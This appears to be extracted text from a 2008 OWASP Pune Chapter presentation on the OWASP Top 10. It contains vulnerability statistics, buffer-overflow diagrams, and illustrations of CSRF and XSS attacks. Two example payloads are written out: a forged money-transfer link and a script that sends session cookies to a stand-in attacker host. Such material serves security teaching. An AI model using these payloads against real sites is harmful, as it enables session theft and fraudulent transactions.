Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
Presentation at the OWASP Pune Chapter, Pune, India
1.
Pune, India, January 2008
2.
SANS @RISK, December 2007

Category             3 Dec  10 Dec  17 Dec  24 Dec  31 Dec  Total
Microsoft Products       2       3      12       0       2     19
Mac                      2       2       2       4       0     10
Linux                   10       5       8      11       0     34
Unix, Solaris, etc       5       3       3       4       1     16
Network Device           1       3       1       1       1      7
Others (various)        31      33      30      37      16    147
Web Applications        70      34      52      35      52    243
8.
OWASP Top 10 2004
12.
[Diagram: stack layout. Labels: Buffer 1; Return address; Other data]
13.
[Diagram: stack layout. Labels: Filled Buffer with NOPs (90909090) and Shellcode; Return Address; Shellcode]
23.
<a href="http://googlified.com.googlepages.com/contactlist.htm">
25.
[Diagram: www.bank.com, Victim and Attacker, steps 1-7. Labels: Logging Request; Auth Cookies; Legitimate Requests; Sends an email containing malicious href tag; Click Here; Transfer Money]
<a href=http://www.bank.com/transfer.php?acc=attacker&amount=$10000>
37.
Reflected XSS BID - 21534
41.
[Diagram: www.bank.com, Victim and Attacker, steps 1-7. Labels: Logging Request; Auth Cookies; Legitimate Requests; Sends malicious request; Click Here; Stolen Cookies]
<script>document.location="http://attacker/steal_cookies.php?cookies="+document.cookie</script>
46.
Injection Flaws
63.
Insecure Direct Object Reference
80.
[Diagram: Client/Server exchange. Pages: login.asp; homepage.asp; logoff. Messages in order: GET www.abc.com; www.abc.com/login.asp; POST username + password; www.abc.com/homepage.asp]
81.
[Diagram: Client/Server exchange. Pages: login.asp; authenticate.asp; homepage.asp; logoff. Labels: Redirect request. Messages in order: GET www.abc.com; www.abc.com/login.asp; POST username + password; Redirect : www.abc.com/homepage.asp; GET www.abc.com/homepage.asp; www.abc.com/homepage.asp]